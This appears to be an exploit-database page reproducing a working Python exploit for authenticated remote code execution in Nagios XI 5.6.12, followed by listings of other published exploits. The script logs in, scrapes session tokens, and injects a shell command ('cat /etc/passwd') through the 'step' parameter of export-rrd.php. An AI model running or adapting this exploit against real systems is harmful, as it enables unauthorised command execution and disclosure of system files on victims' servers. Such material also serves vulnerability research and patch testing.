To access the dashboard, Schedule scans, API and Search become a patron

Search for hundreds of thousands of exploits

"Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution"

Author

Exploit author

"Basim Alabdullah"

Platform

Exploit platform

php

Release date

Exploit published date

2020-07-06

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
# Exploit Title: Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution
# Date: 2020-04-11
# Exploit Author: Basim Alabdullah
# Vendor homepage: https://www.nagios.com
# Version: 5.6.12
# Software link: https://www.nagios.com/downloads/nagios-xi/
# Tested on: CentOS REDHAT 7.7.1908 (core)
#
#                 Authenticated Remote Code Execution
#

import requests
import sys
import re


uname=sys.argv[2]
upass=sys.argv[3]
ipvictim=sys.argv[1]

with requests.session() as s:
    urlz=ipvictim+"/login.php"
    headers = {
        'Accept-Encoding': 'gzip, deflate, sdch',
        'Accept-Language': 'en-US,en;q=0.8',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Referer': ipvictim+'/index.php',
        'Connection': 'keep-alive'
    }
    response = s.get(urlz, headers=headers)
    txt=response.text
    x=re.findall('var nsp_str = "(.*?)"', txt)
    for xx in x:
        login = {
        'username':uname,
        'password':upass,
        'nsp':xx,
        'page':'auth',
        'debug':'',
        'pageopt':'login',
        'redirect':ipvictim+'/index.php',
        'loginButton':''
        }
        rev=s.post(ipvictim+"/login.php",data=login , headers=headers)
        cmd=s.get(ipvictim+"/includes/components/ccm/?cmd=modify&type=host&id=1&page=1",allow_redirects=True)
        txt1=cmd.text
        xp=re.findall('var nsp_str = "(.*?)"', txt1)
        for xxp in xp:
            payload = "a|{cat,/etc/passwd};#"
            exploit=s.get(ipvictim+"/includes/components/xicore/export-rrd.php?host=localhost&service=Root%20Partition&start=011&end=012&step="+payload+"&type=a&nsp="+xxp)
            print(exploit.text)
Release Date Title Type Platform Author
2020-11-20 "Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)" local windows ZwX
2020-11-20 "Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)" local windows "Vincent Wolterman"
2020-11-20 "Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit" local windows stresser
2020-11-20 "WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-11-20 "IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow" local windows "Paolo Stagno"
2020-11-19 "Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)" dos windows "Vincent Wolterman"
2020-11-19 "M/Monit 3.7.4 - Privilege Escalation" webapps multiple "Dolev Farhi"
2020-11-19 "Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure" remote hardware "Nitesh Surana"
2020-11-19 "PESCMS TEAM 2.3.2 - Multiple Reflected XSS" webapps multiple icekam
2020-11-19 "M/Monit 3.7.4 - Password Disclosure" webapps multiple "Dolev Farhi"
Release Date Title Type Platform Author
2020-07-06 "Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution" webapps php "Basim Alabdullah"
2020-04-20 "Centreon 19.10.5 - 'id' SQL Injection" webapps php "Basim Alabdullah"
2020-04-10 "Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal" webapps cgi "Basim Alabdullah"
2020-04-03 "Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution" webapps php "Basim Alabdullah"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48640/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.